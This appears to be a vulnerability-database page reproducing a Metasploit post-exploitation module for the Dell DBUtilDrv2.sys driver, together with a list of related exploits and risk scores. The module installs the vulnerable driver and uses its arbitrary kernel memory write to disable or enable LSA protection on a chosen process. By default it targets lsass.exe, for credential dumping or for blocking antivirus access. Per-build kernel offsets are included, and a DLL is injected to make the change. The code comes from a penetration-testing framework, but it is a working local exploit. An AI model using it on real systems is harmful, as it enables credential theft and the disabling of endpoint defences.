Dell DBUtilDrv2.sys Memory Protection Modifier

🗓️ 22 Dec 2021 17:42:21Reported by SentinelLabs, Kasif Dekel, Red Cursor, Jacob BainesType

Dell DBUtilDrv2.sys Memory Protection Modifier allows attacker to read and write arbitrary kernel-mode memory, bypass secureboot, and prevent antivirus memory access

Reporter	Title	Published	Views	Family All 49
0day.today	Dell DBUtil_2_3.sys IOCTL Memory Read / Write Exploit	17 May 202100:00	–	zdt
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	13 May 202113:23	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	2 Dec 202519:47	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	28 May 202107:29	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	2 Aug 202420:14	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	21 May 202103:13	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	30 May 202110:15	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	3 Sep 202101:47	–	githubexploit
GithubExploit	Exploit for CVE-2018-19320	17 Feb 202620:48	–	githubexploit
GithubExploit	Exploit for Improper Input Validation in Intel Ethernet_Diagnostics_Driver_Iqvw32.Sys	25 Jan 202602:03	–	githubexploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  Rank = ManualRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Process
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dell DBUtilDrv2.sys Memory Protection Modifier',
        'Description' => %q{
          The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a write-what-where condition
          that allows an attacker to read and write arbitrary kernel-mode memory. This module
          installs the provided driver, enables or disables LSA protection on the provided
          PID, and then removes the driver. This would allow, for example, dumping LSASS memory
          even when secureboot is enabled or preventing antivirus from accessing the memory of
          a chosen PID.

          The affected drivers are not distributed with Metasploit. You will truly need to
          Bring Your Own (Dell) Driver.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'SentinelLabs', # Vulnerability discovery in original Dell driver (dbutil_2_3.sys)
          'Kasif Dekel',  # (from SentinelLabs) blog with detailed analysis
          'Red Cursor',   # Authors of PPLKiller
          'Jacob Baines'  # first reference of incomplete patch, poc, & metasploit module
        ],
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ],
        'References' => [
          [ 'URL', 'https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/'],
          [ 'URL', 'https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection'],
          [ 'URL', 'https://itm4n.github.io/lsass-runasppl/'],
          [ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ],
          [ 'URL', 'https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93'],
          [ 'URL', 'https://github.com/RedCursorSecurityConsulting/PPLKiller'],
          [ 'URL', 'https://github.com/jbaines-r7/dellicious' ]
        ],
        'Notes' => {
          'Reliability' => [ ],
          'Stability' => [ CRASH_OS_RESTARTS ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        }
      )
    )
    register_options([
      OptString.new('DRIVER_PATH', [true, 'The path containing the driver inf, cat, and sys (and coinstaller)', '']),
      OptInt.new('PID', [true, 'The targetted process. If set to 0 the module will automatically target lsass.exe', '0']),
      OptBool.new('ENABLE_MEM_PROTECT', [true, 'Enable or disable memory protection', 'false'])
    ])
  end

  def get_eproc_offsets
    unless session.platform == 'windows'
      print_status("Target is not Windows. Found #{session.platform}")
      return nil
    end

    version = get_version_info
    vprint_status("Windows Build Number = #{version.build_number}")

    # UniqueProcessIdOffset, ActiveProcessLinksOffset, SignatureLevelOffset
    offsets = {
      Msf::WindowsVersion::Win10_1507 => [ 0x02e8, 0x02f0, 0x06a8 ], # Gold
      Msf::WindowsVersion::Win10_1511 => [ 0x02e8, 0x02f0, 0x06b0 ], # 2015 update
      Msf::WindowsVersion::Win10_1607 => [ 0x02e8, 0x02f0, 0x06c8 ], # 2016 update
      Msf::WindowsVersion::Win10_1703 => [ 0x02e0, 0x02e8, 0x06c8 ], # April 2017 update
      Msf::WindowsVersion::Win10_1709 => [ 0x02e0, 0x02e8, 0x06c8 ], # Fall 2017 update
      Msf::WindowsVersion::Win10_1803 => [ 0x02e0, 0x02e8, 0x06c8 ], # April 2018 update
      Msf::WindowsVersion::Win10_1809 => [ 0x02e0, 0x02e8, 0x06c8 ], # October 2018 update
      Msf::WindowsVersion::Win10_1903 => [ 0x02e8, 0x02f0, 0x06f8 ], # May 2019 update
      Msf::WindowsVersion::Win10_1909 => [ 0x02e8, 0x02f0, 0x06f8 ], # November 2019 update
      Msf::WindowsVersion::Win10_2004 => [ 0x0440, 0x0448, 0x0878 ], # May 2020 update
      Msf::WindowsVersion::Win10_20H2 => [ 0x0440, 0x0448, 0x0878 ], # October 2020 update
      Msf::WindowsVersion::Win10_21H1 => [ 0x0440, 0x0448, 0x0878 ], # May 2021 update
      Msf::WindowsVersion::Win10_21H2 => [ 0x0440, 0x0448, 0x0878 ], # October 2021 update
      Msf::WindowsVersion::Win11_21H2 => [ 0x0440, 0x0448, 0x0878 ]  # Win 11 June/September 2021
    }

    unless offsets.key?(version.build_number)
      print_status("Unknown offsets for Windows build #{version.build_number}")
      return nil
    end

    return offsets[version.build_number]
  end

  def run
    unless is_system?
      fail_with(Failure::None, 'Elevated session is required')
    end

    offsets = get_eproc_offsets
    if offsets.nil?
      fail_with(Failure::NoTarget, 'Unsupported target')
    end

    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    end

    unless datastore['DRIVER_PATH'].include? '\\'
      fail_with(Failure::BadConfig, "The driver path must be a file path. User provided: #{datastore['DRIVER_PATH']}")
    end

    # If the user doesn't select a PID select lsass.exe for them
    target_pid = datastore['PID']
    if target_pid == 0
      target_pid = pidof('lsass.exe').first
      print_status("Set PID option #{target_pid} for lsass.exe")
    end

    params = datastore['DRIVER_PATH']
    params += ','
    params += target_pid.to_s
    params += ','
    params += (datastore['ENABLE_MEM_PROTECT'] ? '1' : '0')
    params += ','
    params += offsets[0].to_s # UniqueProcessIdOffset
    params += ','
    params += offsets[1].to_s # ActiveProcessLinksOffset
    params += ','
    params += offsets[2].to_s # SignatureLevelOffset

    execute_dll(::File.join(Msf::Config.data_directory, 'exploits', 'dell_protect', 'dell_protect.x64.dll'), params)

    print_good('Exploit finished')
  end
end

01 Apr 2026 19:01Current

8.1High risk

Vulners AI Score8.1

CVSS 24.6

CVSS 3.17.8 - 8.8

EPSS0.57474

SSVC